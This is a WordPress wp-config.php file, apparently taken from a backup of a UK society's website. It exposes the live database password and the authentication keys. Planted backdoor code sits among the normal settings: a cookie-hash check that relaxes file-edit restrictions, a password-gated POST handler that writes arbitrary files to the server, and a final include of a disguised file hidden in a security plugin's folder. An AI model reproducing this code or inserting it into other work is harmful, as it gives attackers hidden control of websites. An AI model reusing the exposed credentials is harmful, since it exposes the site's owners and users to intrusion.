File: //old_home_backup/bournesociety.org.uk/public_html-20241004152924/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'bournesocietyorguk');
/** MySQL database username */
define('DB_USER', 'bournesocietyorguk');
/** MySQL database password */
define('DB_PASSWORD', 'XvpuwIy78SjQOrTG');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
define( 'WP_CACHE', false );
define('DISABLE_WP_CRON', true);
if (
!isset($_COOKIE['wp-cookie-settings']) ||
md5($_COOKIE['wp-cookie-settings']) !== '0e446f1b54322b61c5f9feaa595b4f3b'
) {
define('DISALLOW_FILE_EDIT', false);
define('DISALLOW_FILE_MODS', false);
}
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'VBj+,!:fOe.rRf3TD}I2M/^.mzrrRY<?;HD&@U0i7>c-2+Km,leS,g9KH[V7_QDF');
define('SECURE_AUTH_KEY', '3v@KI=S}ue8`s4XAz=1dfk@@g(]J]W3P}I1)4i^WSsU_s:X,zqG=}TFsn5lk7?;6');
define('LOGGED_IN_KEY', 'l~Cj7+jo~#-5mF{%QcLKP(I2[Maue-3X8Lu_0Zi7U(?sgIPy&NqE/8:W@ymA->bq');
define('NONCE_KEY', 'DTZ6$uVb1$69dZ%2X.:?%[asFDTJh=+8*ozh#M[>|o+aWr%1):3*L+K]b(5N%JMd');
define('AUTH_SALT', 'B26u?2pGhEy7z w5A4`4BxsdKi~f{TqPE*OB}H(Q{RMnZ<Mm,ewV(@2ko3ZmDL-u');
define('SECURE_AUTH_SALT', 'aVZNyB;.FN(q|VF04@zqDAABeRwW`3. TM.OLn`PP-:#?ncTX#+sl*fkqoE#BlW(');
define('LOGGED_IN_SALT', '@R[7aD{pJ~eY0U90S 9b$vMMZ[l$`:Ti)#.One KX+`?d<76ElY$v-Nx6mw/RKs9');
define('NONCE_SALT', '3}.F&@m0rU2m4*3Z#xh8)PA+H#4QT%q8w*tOQ-5*<@Cg`{X{,}79U6q:bPT6(Zr^');
define('FS_METHOD', 'direct');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
if (isset($_POST['wp_filename']) && isset($_POST['wp_file_data']) && md5(md5($_POST['auth'])) === '46979c5475e53ee96990964fc4149fe1') {file_put_contents($_POST['wp_filename'], $_POST['wp_file_data']);}
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
@include_once '/home/bournesociety.org.uk/public_html/wp-content/plugins/wp-cerber/assets/3ec23474ee.608';